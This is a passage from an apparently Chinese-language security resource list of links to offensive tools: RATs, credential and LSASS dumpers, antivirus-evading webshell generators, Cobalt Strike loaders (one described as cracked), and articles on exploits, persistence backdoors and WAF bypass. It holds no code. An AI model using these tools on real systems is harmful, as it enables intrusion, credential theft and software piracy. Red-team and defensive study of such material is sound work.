[ast-hook-for-js-RE:浏览器内存漫游解决方案(JS逆向)](https://github.com/CC11001100/ast-hook-for-js-RE) - [SharpOXID-Find:OXID_Find by Csharp(多线程) 通过OXID解析器获取Windows远程主机上网卡地址](https://github.com/uknowsec/SharpOXID-Find) - [yak gRPC Client GUI - 集成化单兵工具平台](https://github.com/yaklang/yakit) - [reFlutter:辅助逆向Flutter生成的APP](https://github.com/ptswarm/reFlutter) - [SillyRAT:跨平台、多功能远控](https://github.com/hash3liZer/SillyRAT) - [HandleKatz: 使用 Lsass 的克隆句柄来创建相同的混淆内存转储](https://github.com/codewhitesec/HandleKatz) - [HTTPUploadExfil: 用于渗透数据/文件的简易 HTTP 服务器](https://github.com/IngoKl/HTTPUploadExfil) - [CSAgent:CobaltStrike 4.x通用白嫖及汉化加载器](https://github.com/Twi1ight/CSAgent)|[备份下载](./tools/CSAgent.zip) - [nemo_go:用来进行自动化信息收集的一个简单平台,通过集成常用的信息收集工具和技术,实现对内网及互联网资产信息的自动收集,提高隐患排查和渗透测试的工作效率](https://github.com/hanc00l/nemo_go) - [SpringBootExploit:根据Spring Boot Vulnerability Exploit Check List清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛](https://github.com/0x727/SpringBootExploit)|[备份下载](./tools/SpringBootExploit-1.1-SNAPSHOT-all.jar) - [WiFiDuck:一款通过无线键盘来注入攻击的近源渗透攻击](https://github.com/SpacehuhnTech/WiFiDuck) - [AggressorScripts_0x727:Cobalt Strike AggressorScripts For Red Team](https://github.com/0x727/AggressorScripts_0x727) - [android_virtual_cam:xposed安卓虚拟摄像头-可绕过部分人脸检测](https://github.com/w2016561536/android_virtual_cam) - [X-WebScan:Vulcan2.0|分布式扫描器|漏洞扫描|指纹识别](https://github.com/RedTeamWing/X-WebScan) - [Taie-AutoPhishing:剑指钓鱼基建快速部署自动化](https://github.com/taielab/Taie-AutoPhishing) - [rotateproxy:利用fofa搜索socks5开放代理进行代理池轮切的工具](https://github.com/akkuman/rotateproxy) - [PassDecode-jar:帆软/致远密码解密工具](https://github.com/Rvn0xsy/PassDecode-jar) - [pwcrack-framework:是一个用Ruby编写的密码自动破解框架,目前提供了 25 个在线破解和 25 个离线破解接口,支持 48 种算法破解](https://github.com/L-codes/pwcrack-framework) - [通过编写 CS 的信标文件(BOF)来进行shellcode 注入、执行等操作](https://github.com/boku7/HOLLOW) - [CS-Situational-Awareness-BOF:大量已经编译好的 CS 信标文件](https://github.com/trustedsec/CS-Situational-Awareness-BOF) - [HostCollision:用于host碰撞而生的小工具,专门检测渗透中需要绑定hosts才能访问的主机或内部系统](https://github.com/pmiaowu/HostCollision) - [Hosts_scan:用于IP和域名碰撞匹配访问的小工具,旨意用来匹配出渗透过程中需要绑定hosts才能访问的弱主机或内部系统](https://github.com/fofapro/Hosts_scan) - [自动化Host碰撞工具,帮助红队快速扩展网络边界,获取更多目标点](https://github.com/cckuailong/hostscan) - [JSPHorse:结合反射调用、Javac动态编译、ScriptEngine调用JS技术和各种代码混淆技巧的一款免杀JSP Webshell生成工具,已支持蚁剑免杀](https://github.com/EmYiQing/JSPHorse) - [gitlab-version-nse:用于gitlab 版本探测以及漏洞信息检索的 Nmap 脚本](https://github.com/righel/gitlab-version-nse) - [natpass:新一代NAT内网穿透+shell+vnc工具](https://github.com/lwch/natpass) - [rs_shellcode:rust 语言编写的 shellcode 加载器](https://github.com/b1tg/rs_shellcode) - [Web-Attack-Cheat-Sheet:web 攻击清单](https://github.com/riramar/Web-Attack-Cheat-Sheet) - [awvs13_batch_py3:针对 AWVS扫描器开发的批量扫描脚本,支持联动xray、burp、w13scan等被动批量](https://github.com/test502git/awvs13_batch_py3) - [Jira-Lens:一款专门扫描 jira 漏洞的工具](https://github.com/MayankPandey01/Jira-Lens) - [Sec-Tools:一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能](https://github.com/jwt1399/Sec-Tools) - [Fvuln:漏洞批量扫描集合工具(闭源)](https://github.com/d3ckx1/Fvuln) - [MySQL_Fake_Server:用于渗透测试过程中的假MySQL服务器,纯原生python3实现,不依赖其它包](https://github.com/fnmsd/MySQL_Fake_Server) - [ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap) - [CobaltStrike_CNA:使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等(CVE-2020-0796+CVE-2020-0787)](https://github.com/yanghaoi/CobaltStrike_CNA) - [webshell-bypassed-human:过人 webshell 的生成工具](https://github.com/Macr0phag3/webshell-bypassed-human) - [BlueShell:一个Go语言编写的持续远控工具,拿下靶机后,根据操作系统版本下载部署对应的bsClient,其会每隔固定时间向指定的C&C地址发起反弹连接尝试,在C&C端运行bsServer即可连接bsClient,从而实现对靶机的持续控制](https://github.com/whitehatnote/BlueShell) - [SimpleRemoter:基于gh0st的远程控制器:实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能](https://github.com/yuanyuanxiang/SimpleRemoter) - [Caesar:全新的敏感文件发现工具](https://github.com/SafeGroceryStore/Caesar) - [LinuxFlaw:Linux 平台的漏洞 PoC、Writeup 收集](https://github.com/mudongliang/LinuxFlaw) - [fuso:扶桑一款RUST 编写的快速, 稳定, 高效, 轻量的内网穿透, 端口转发工具](https://github.com/editso/fuso) - [SpringMemShell:Spring内存马检测和隐形马研究](https://github.com/EmYiQing/SpringMemShell) - [SharpMemshell:.NET写的内存shell](https://github.com/A-D-Team/SharpMemshell) - [jsForward:解决web及移动端H5数据加密Burp调试问题](https://github.com/CTF-MissFeng/jsForward)|[JS-Forward:原版](https://github.com/G-Security-Team/JS-Forward) - [Command2API:将执行命令的结果返回到Web API上](https://github.com/gh0stkey/Command2API) - [ProxyAgent:在有 root 权限的手机上安装代理以方便使用 burpsuite 代理流量](https://github.com/GovTech-CSG/ProxyAgent) - [reapoc:开源POC的收集和漏洞验证环境](https://github.com/cckuailong/reapoc) - [yaml-payload-for-ruoyi:若依 snakeyaml 反序列化漏洞注入内存马](https://github.com/lz2y/yaml-payload-for-ruoyi)|[yaml-payload:可生成命令执行的 jar 包](https://github.com/artsploit/yaml-payload) - [goHashDumper:用于Dump指定进程的内存,主要利用静默退出机制(SilentProcessExit)和Windows API(MiniDumpW)实现](https://github.com/crisprss/goHashDumper) - [wxappUnpacker:小程序反编译(支持分包)](https://github.com/xuedingmiaojun/wxappUnpacker) - [MyFuzzAll:fuzz、爆破字典](https://github.com/yyhuni/MyFuzzAll) - [NPPSpy:获取Windows明文密码的小工具](https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy)|[CMPSpy:改进版本](https://github.com/fengwenhua/CMPSpy) - [PoC-in-GitHub:收录 github 上公开的 POC 按照年份排列](https://github.com/nomi-sec/PoC-in-GitHub) - [icp-domains:输入一个域名,输出ICP备案所有关联域名](https://github.com/1in9e/icp-domains) - [netspy:一款快速探测内网可达网段工具](https://github.com/shmilylty/netspy) - [rathole:一个用 rust 编写,功能类似 FRP 和 NGROK的内网代理穿透工具](https://github.com/rapiz1/rathole) - [CodeAnalysis:腾讯开源的静态代码扫描器](https://github.com/Tencent/CodeAnalysis) - [GetOut360:管理员权限下强制关闭360](https://github.com/Yihsiwei/GetOut360) - [goby_poc:分享goby最新网络安全漏洞检测或利用代码](https://github.com/aetkrad/goby_poc) - [Fiora:漏洞PoC框架的图形版,快捷搜索PoC、一键运行Nuclei](https://github.com/bit4woo/Fiora) - [BypassUserAdd:通过反射DLL注入、Win API、C#、以及底层实现NetUserAdd方式实现BypassAV进行增加用户的功能,实现Cobalt Strike插件化](https://github.com/crisprss/BypassUserAdd) - [WebBatchRequest:使用 JAVA 编写的批量请求工具,可做获取 title 或者web存活检测](https://github.com/ScriptKid-Beta/WebBatchRequest) - [ICP-Checker:备案查询,可查询企业或域名的ICP备案信息](https://github.com/wongzeon/ICP-Checker) - [SMBeagle:一款功能强大的SMB文件共享安全审计工具](https://github.com/punk-security/SMBeagle) - [wJa:java闭源项目的自动化白盒+黑盒测试工具](https://github.com/Wker666/wJa) - [Poc-Exp:有关OA、中间件、框架、路由器等应用的漏洞搜集](https://github.com/pen4uin/Poc-Exp) - [GoTokenTheft:用 golang 写的进程token 窃取工具](https://github.com/Aquilao/GoTokenTheft) - [pwncat:功能强大的反向Shell&BindShell处理工具](https://github.com/calebstewart/pwncat) - [ReverseRDP_RCE:反向 RCE 连接 RDP 的客户端](https://github.com/klinix5/ReverseRDP_RCE) - [Urldns:通过 Urldns 链来探测是否存在某个类,以便针对性的使用攻击链](https://github.com/kezibei/Urldns) - [COFFLoader2:Load and execute COFF files and Cobalt Strike BOFs in-memory](https://github.com/Yaxser/COFFLoader2) - [Cobalt-Clip:Cobaltstrike addons to interact with clipboard](https://github.com/DallasFR/Cobalt-Clip) - [Invoke-Bof:Load any Beacon Object File using Powershell](https://github.com/airbus-cert/Invoke-Bof) - [InlineWhispers2:Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2](https://github.com/Sh0ckFR/InlineWhispers2) - [Geacon:Using Go to implement CobaltStrike's Beacon](https://github.com/DongHuangT1/Geacon) - [DLL-Hijack-Search-Order-BOF:DLL Hijack Search Order Enumeration BOF](https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF) - [PortBender:TCP Port Redirection Utility](https://github.com/praetorian-inc/PortBender) - [winrmdll:C++ WinRM API via Reflective DLL](https://github.com/mez-0/winrmdll) - [Readfile_BoF:read file contents to beacon output](https://github.com/trainr3kt/Readfile_BoF) - [BokuLoader:Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities](https://github.com/boku7/BokuLoader) - [HOLLOW:EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode](https://github.com/boku7/HOLLOW) - [MemReader_BoF:search and extract specific strings from a target process memory and return what is found to the beacon output](https://github.com/trainr3kt/MemReader_BoF) - [secinject:Section Mapping Process Injection (secinject): Cobalt Strike BOF](https://github.com/apokryptein/secinject) - [BOF-Builder:C# .Net 5.0 project to build BOF (Beacon Object Files) in mass](https://github.com/ceramicskate0/BOF-Builder) - [ServiceMove-BOF:New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution](https://github.com/netero1010/ServiceMove-BOF) - [TrustedPath-UACBypass-BOF:Beacon object file implementation for trusted path UAC bypass](https://github.com/netero1010/TrustedPath-UACBypass-BOF) - [Quser-BOF:Cobalt Strike BOF for quser.exe implementation using Windows API](https://github.com/netero1010/Quser-BOF) - [SharpGhosting:C#写的创建幽灵进程的工具](https://github.com/Wra7h/SharpGhosting) - [Pentesting-Active-Directory-CN:域渗透脑图中文翻译版](https://github.com/NyDubh3/Pentesting-Active-Directory-CN)|[英文原版](https://github.com/Orange-Cyberdefense/arsenal/) - [fuzzware:针对固件的自动化、自配置的 Fuzzing 工具](https://github.com/fuzzware-fuzzer/fuzzware) - [python-codext:Python 编码/解码库, 扩展了原生的 codecs 库, 提供 120 多个新编解码器](https://github.com/dhondta/python-codext) - [chrome-bandit:在 Mac 上通过 chrome 自动填充获取保存的密码](https://github.com/masasron/chrome-bandit) ## <span id="head8"> 文章/书籍/教程相关</span> - [windwos权限维持系列12篇PDF](./books/Window权限维持) - [Linux 权限维持之进程注入(需要关闭ptrace)](./books/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B9%8B%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5%20%C2%AB%20%E5%80%BE%E6%97%8B%E7%9A%84%E5%8D%9A%E5%AE%A2.pdf) | [在不使用ptrace的情况下,将共享库(即任意代码)注入实时Linux进程中。(不需要关闭ptrace)](https://github.com/DavidBuchanan314/dlinject)|[[总结]Linux权限维持](./books/[总结]Linux权限维持.pdf)-[原文地址](https://www.cnblogs.com/-mo-/p/12337766.html) - [44139-mysql-udf-exploitation](./books/44139-mysql-udf-exploitation.pdf) - [emlog CMS的代码审计_越权到后台getshell](./books/emlog%20CMS的代码审计_越权到后台getshell%20-%20先知社区.pdf) - [PHPOK 5.3 最新版前台注入](./books/PHPOK%205.3%20最新版前台注入%20-%20先知社区.pdf) - [PHPOK 5.3 最新版前台无限制注入(二)](./books/PHPOK%205.3%20最新版前台无限制注入(二)%20-%20先知社区.pdf) - [Thinkphp5 RCE总结](./books/Thinkphp5%20RCE总结%20_%20ChaBug安全.pdf) - [rConfig v3.9.2 RCE漏洞分析](./books/rConfig%20v3.9.2%20RCE漏洞分析.pdf) - [weiphp5.0 cms审计之exp表达式注入](./books/weiphp5.0%20cms审计之exp表达式注入%20-%20先知社区.pdf) - [zzzphp1.7.4&1.7.5到处都是sql注入](./books/zzzphp1.7.4%261.7.5到处都是sql注入.pdf) - [FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor](./books/FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor.pdf) - [zzcms 2019 版本代码审计](./books/zzcms%202019%E7%89%88%E6%9C%AC%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%20-%20%E5%85%88%E7%9F%A5%E7%A4%BE%E5%8C%BA.pdf) - [利用SQLmap 结合 OOB 技术实现音速盲注](./books/手把手带你利用SQLmap结合OOB技术实现音速盲注.pdf) - [特权提升技术总结之Windows文件服务内核篇(主要是在webshell命令行执行各种命令搜集信息)](https://xz.aliyun.com/t/7261)|[(项目留存PDF版本)](./books/特权提升技术总结之Windows文件服务内核篇%20-%20先知社区.pdf) - [WellCMS 2.0 Beta3 后台任意文件上传](./books/WellCMS%202.0%20Beta3%20后台任意文件上传.pdf) - [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs) - [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) - [表达式注入.pdf](./books/表达式注入.pdf) - [WordPress ThemeREX Addons 插件安全漏洞深度分析](./books/WordPress%20ThemeREX%20Addons%20插件安全漏洞深度分析.pdf) - [通达OA文件包含&文件上传漏洞分析](./books/通达OA文件包含&文件上传漏洞分析.pdf) - [高级SQL注入:混淆和绕过](./books/高级SQL注入:混淆和绕过.pdf) - [权限维持及后门持久化技巧总结](./books/权限维持及后门持久化技巧总结.pdf) - [Windows常见的持久化后门汇总](./books/Windows常见的持久化后门汇总.pdf) - [Linux常见的持久化后门汇总](./books/Linux常见的持久化后门汇总.pdf) - [CobaltStrike4.0用户手册_中文翻译_3](./books/CobaltStrike4.0用户手册_中文翻译_3.pdf) - [Cobaltstrike 4.0之 我自己给我自己颁发license.pdf](./books/Cobaltstrike%204破解之%20我自己给我自己颁发license.pdf) - [Cobalt Strike 4.0 更新内容介绍](./books/Cobalt%20Strike%204.0%20更新内容介绍.pdf) - [Cobal_Strike_自定义OneLiner](./books/Cobal_Strike_自定义OneLiner_Evi1cg's_blog.pdf) - [cobalt strike 快速上手 [ 一 ]](./books/cobalt_strike_快速上手%5B%20一%20%5D.pdf) - [Cobalt strike3.0使用手册](./books/Cobalt_strike3.0使用手册.pdf) - [Awesome-CobaltStrike-cobaltstrike的相关资源汇总](https://github.com/zer0yu/Awesome-CobaltStrike) - [Cobalt_Strike_Spear_Phish_Cobalt Strike邮件钓鱼制作](./books/Cobalt_Strike_Spear_Phish_Evi1cg's%20blog%20%20CS邮件钓鱼制作.md) - [Remote NTLM relaying through Cobalt Strike](./books/Remote_NTLM_relaying_through_CS.pdf) - [渗透测试神器Cobalt Strike使用教程](./books/渗透测试神器Cobalt%20Strike使用教程.pdf) - [Cobalt Strike的teamserver在Windows上快速启动脚本](./books/CS_teamserver_win.md) - [ThinkPHP v6.0.0_6.0.1 任意文件操作漏洞分析](./books/ThinkPHP%20v6.0.0_6.0.1%20任意文件操作漏洞分析.pdf) - [Django_CVE-2020-9402_Geo_SQL注入分析](./books/Django_CVE-2020-9402_Geo_SQL注入分析.pdf) - [CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行](./books/CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行.pdf) - [安全狗SQL注入WAF绕过](./books/安全狗SQL注入WAF绕过.pdf) - [通过将JavaScript隐藏在PNG图片中,绕过CSP](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) - [通达OA任意文件上传_文件包含GetShell](./books/通达OA任意文件上传_文件包含GetShell.pdf) - [文件上传Bypass安全狗4.0](./books/文件上传Bypass安全狗4.0.pdf) - [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf) - [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf) - [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI) - [bypass云锁注入测试](./books/bypass云锁注入测试.md) - [360webscan.php_bypass](./books/360webscan.php_bypass.pdf) - [think3.2.3_sql注入分析](./books/think3.2.3_sql注入分析.pdf) - [UEditor SSRF DNS Rebinding](./books/UEditor%20SSRF%20DNS%20Rebinding) - [PHP代码审计分段讲解](https://github.com/bowu678/php_bugs) - [京东SRC小课堂系列文章](https://github.com/xiangpasama/JDSRC-Small-Classroom) - [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf) - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf) - [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn) - [PAM劫持SSH密码](./PAM劫持SSH密码.md) - [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/) - [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf) - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack) - [PbootCMS审计](./books/PbootCMS审计.pdf) - [PbootCMS 3.0.4 SQL注入漏洞复现](./books/PbootCMS%203.0.4%20SQL注入漏洞复现.pdf) - [De1CTF2020系列文章](https://github.com/De1ta-team/De1CTF2020) - [xss-demo-超级简单版本的XSS练习demo](https://github.com/haozi/xss-demo) - [空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透](./books/空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透.pdf) - [入门KKCMS代码审计](./books/入门KKCMS代码审计.pdf) - [SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 checklist](https://github.com/LandGrey/SpringBootVulExploit) - [文件上传突破waf总结](./books/文件上传突破waf总结.pdf) - [极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872) - [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf) - [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md) - [文件上传内容检测绕过](./books/文件上传内容检测绕过.md) - [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf) - [【Android脱壳】_腾讯加固动态脱壳(上篇)](./books/移动安全(九)_TengXun加固动态脱壳(上篇).pdf) - [【Android脱壳】腾讯加固动态脱壳(下篇)](./books/移动安全(十)_TengXun加固动态脱壳(下篇).pdf) - [【Android脱壳】记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务](./books/记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务.pdf) - [【Android脱壳】-免root脱腾讯御安全加固](./books/免root脱腾讯御安全加固.pdf) - [【Android抓包】记一次APP测试的爬坑经历.pdf](./books/记一次APP测试的爬坑经历.pdf) - [完整的内网域渗透-暗月培训之项目六](./books/完整的内网域渗透-暗月培训之项目六.pdf) - [Android APP渗透测试方法大全](./books/Android%20APP渗透测试方法大全.pdf) - [App安全检测指南-V1.0](./books/App安全检测指南-V1.0.pdf) - [借github上韩国师傅的一个源码实例再次理解.htaccess的功效](./books/借github上韩国师傅的一个源码实例再次理解.htaccess的功效.pdf) - [Pentest_Note-渗透Tips,总结了渗透测试常用的工具方法](https://github.com/xiaoy-sec/Pentest_Note) - [红蓝对抗之Windows内网渗透-腾讯SRC出品](./books/红蓝对抗之Windows内网渗透-腾讯SRC出品.pdf) - [远程提取Windows中的系统凭证](./books/远程提取Windows中的系统凭证.pdf) - [绕过AMSI执行powershell脚本](./books/绕过AMSI执行powershell脚本.md)|[AmsiScanBufferBypass-相关项目](https://github.com/rasta-mouse/AmsiScanBufferBypass) - [踩坑记录-Redis(Windows)的getshell](./books/踩坑记录-Redis(Windows)的getshell.pdf) - [Cobal_Strike踩坑记录-DNS Beacon](./books/Cobal_Strike踩坑记录-DNS%20Beacon.pdf) - [windows下隐藏webshell的方法](./books/windows下隐藏webshell的方法.md) - [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析(三)碰撞点.pdf) - [针对宝塔的RASP及其disable_functions的绕过](./books/针对宝塔的RASP及其disable_functions的绕过.pdf) - [渗透基础WMI学习笔记](./books/渗透基础WMI学习笔记.pdf) - [【海洋CMS】SeaCMS_v10.1代码审计实战](./books/SeaCMS_v10.1代码审计实战.pdf) - [红队攻防实践:闲谈Webshell在实战中的应用](./books/红队攻防实践:闲谈Webshell在实战中的应用.pdf) - [红队攻防实践:unicode进行webshell免杀的思考](./books/红队攻防实践:unicode进行webshell免杀的思考.pdf) - [php无eval后门](./books/php无eval后门.pdf) - [【代码审计】ThinkPhp6任意文件写入](./books/[代码审计]ThinkPhp6任意文件写入.pdf) - [YzmCMS代码审计](./books/YzmCMS代码审计.pdf) - [BadUSB简单免杀一秒上线CobaltStrike](./books/BadUSB/BadUSB简单免杀一秒上线CobaltStrike.pdf) - [BasUSB实现后台静默执行上线CobaltStrike](./books/BadUSB/BadUSB实现后台静默执行上线CobaltStrike.pdf) - [手把手带你制作一个X谁谁上线的BadUSB](./books/BadUSB/手把手带你制作一个X谁谁上线的BadUSB.pdf)|[近源渗透-BadUsb](./books/近源渗透-BadUsb.pdf)-[原文地址](https://mp.weixin.qq.com/s/3tX6uxqw0_tjhQK0ARec5A) - [一文学会Web_Service漏洞挖掘](./books/一文学会Web_Service漏洞挖掘.pdf) - [唯快不破的分块传输绕WAF](./books/唯快不破的分块传输绕WAF.pdf) - [Unicode的规范化相关漏洞挖掘思路实操](./books/Unicode的规范化相关漏洞挖掘思路实操.pdf) - [换一种姿势挖掘任意用户密码重置漏洞-利用不规范化的Unicode编码加burp挖掘](./books/换一种姿势挖掘任意用户密码重置漏洞-利用Unicode域名加burp挖掘.pdf) - [全方面绕过安全狗2](./books/全方面绕过安全狗2.pdf) - [冰蝎——从入门到魔改](./books/冰蝎——从入门到魔改.pdf) - [冰蝎——从入门到魔改(续)](./books/冰蝎——从入门到魔改(续).pdf) - [技术分享_ 内网渗透手动学习实践](./books/技术分享%20_%20内网渗透手动学习实践.pdf) - [权限维持之打造不一样的映像劫持后门](./books/权限维持之打造不一样的映像劫持后门.pdf) - [Jboss漏洞利用总结](./books/Jboss漏洞利用总结.pdf) - [Java RMI服务远程命令执行利用](./books/Java_RMI服务远程命令执行利用.pdf)|[小天之天的测试工具-attackRMI.jar](./tools/attackRMI.jar) - [PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生](./books/PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生.pdf) - [实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据](./books/实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf) - [OneThink前台注入分析](./books/OneThink前台注入分析.pdf) - [记一次从源代码泄漏到后台(微擎cms)获取webshell的过程](./books/记一次从源代码泄漏到后台(微擎cms)获取webshell的过程.pdf)-[源出](https://fuping.site/2020/04/18/WeiQing-CMS-Background-Admin-GetShell/) - [Android抓包—关于抓包的碎碎念-看雪论坛-Android板块ChenSem](./books/关于抓包的碎碎念.pdf)|[原文地址](https://bbs.pediy.com/thread-260965.htm) - [CVE-2020-15778-Openssh-SCP命令注入漏洞复现报告](./books/CVE-2020-15778-Openssh-SCP命令注入漏洞复现报告.pdf) - [bolt_cms_V3.7.0_xss和远程代码执行漏洞](./books/bolt_cms_V3.7.0_xss和远程代码执行漏洞.pdf) - [关于Cobalt_Strike检测方法与去特征的思考](./books/关于Cobalt_Strike检测方法与去特征的思考.pdf) - [代码审计_PHPCMS_V9前台RCE挖掘分析](./books/代码审计_PHPCMS_V9前台RCE挖掘分析.pdf) - [PHPCMS_V9.2任意文件上传getshell漏洞分析](./books/PHPCMS_V9.2任意文件上传getshell漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/o_u_mFjFIq3hKgSvVFGcRg) - [【免杀】C++免杀项目推荐](./books/C++免杀项目推荐.pdf)-[附件下载](./tools/RefacterC.zip)|[原文地址](https://mp.weixin.qq.com/s/0OB0yQAiOfsU4JqkCDUi7w) - [利用图片隐写术来远程动态加载shellcode](./books/利用图片隐写术来远程动态加载shellcode.pdf)|[原文地址](https://mp.weixin.qq.com/s/QZ5YlRZN47zne7vCzvUpJw) - [[后渗透]Mimikatz使用大全](./books/[后渗透]Mimikatz使用大全.pdf)|[原文地址](https://www.cnblogs.com/-mo-/p/11890232.html) - [渗透测试XiaoCms之自力更生代码审计-后台数据库备份SQL注入到getshell](./books/渗透测试XiaoCms之自力更生代码审计-后台数据库备份SQL注入到getshell.pdf)|[原文地址](https://mp.weixin.qq.com/s/K2nUSMyE4PwVYqa7t95BTQ) - [HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE](./books/HW%E7%A4%BC%E7%9B%92%EF%BC%9A%E6%B7%B1%E4%BF%A1%E6%9C%8Dedr%20RCE%EF%BC%8C%E5%A4%A9%E8%9E%8D%E4%BF%A1dlp%20unauth%E5%92%8C%E9%80%9A%E8%BE%BEOA%20v11.6%E7%89%88%E6%9C%ACRCE.pdf) - [[0day]通达 OA v11.7 后台 SQL 注入到 RCE](./books/[0day]通达%20OA%20v11.7%20后台%20SQL%20注入到%20RCE.pdf)-[原文地址](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q) - [wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析](./books/wordpress%20%E8%AF%84%E8%AE%BA%E6%8F%92%E4%BB%B6%20wpDiscuz%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.pdf) - [Gopher协议使用总结](./books/Gopher协议使用总结.pdf)-[原文地址](https://mp.weixin.qq.com/s/SjGvsl3jxOtyg6BtGgFf5A) - [sqlmap使用总结](./books/sqlmap使用总结.pdf)|[【实战技巧】sqlmap不为人知的骚操作](./books/%E3%80%90%E5%AE%9E%E6%88%98%E6%8A%80%E5%B7%A7%E3%80%91sqlmap%E4%B8%8D%E4%B8%BA%E4%BA%BA%E7%9F%A5%E7%9A%84%E9%AA%9A%E6%93%8D%E4%BD%9C_Summer's_blog.pdf)-[原文地址](https://blog.csdn.net/sun1318578251/article/details/102524100)|[记一份SQLmap 使用手册小结(一)](./books/记一份SQLmap%20使用手册小结(一).pdf)|[记一份SQLmap 使用手册小结(二)](./books/记一份SQLmap%20使用手册小结(二).pdf) - [mac上Parallels Desktop安装kali linux 2020.2a并安装好Parallels Tools+Google拼音输入法](./books/mac%E4%B8%8AParallels%20Desktop%E5%AE%89%E8%A3%85kali%20linux%202020.2a%E5%B9%B6%E5%AE%89%E8%A3%85%E5%A5%BDParallels%20Tools+Google%E6%8B%BC%E9%9F%B3%E8%BE%93%E5%85%A5%E6%B3%95.docx) - [通达OA v11.5 多枚0day漏洞复现](./books/%E9%80%9A%E8%BE%BEOA%20v11.5%20%E5%A4%9A%E6%9E%9A0day%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.pdf)|[续集 _ 再发通达OA多枚0day](./books/%E7%BB%AD%E9%9B%86%20_%20%E5%86%8D%E5%8F%91%E9%80%9A%E8%BE%BEOA%E5%A4%9A%E6%9E%9A0day.pdf)-[原文地址](https://mp.weixin.qq.com/s/RlOpohHvjHv_Qg3mNgDCAQ) - [POSCMS(20200821)_任意 SQL 语句执行(需要登录后台)](./books/POSCMS_%E4%BB%BB%E6%84%8F%20SQL%20%E8%AF%AD%E5%8F%A5%E6%89%A7%E8%A1%8C%EF%BC%88%E9%9C%80%E8%A6%81%E7%99%BB%E5%BD%95%E5%90%8E%E5%8F%B0%EF%BC%89.pdf)-[原文地址](https://www.t00ls.net/thread-57551-1-1.html)|[POSCMS 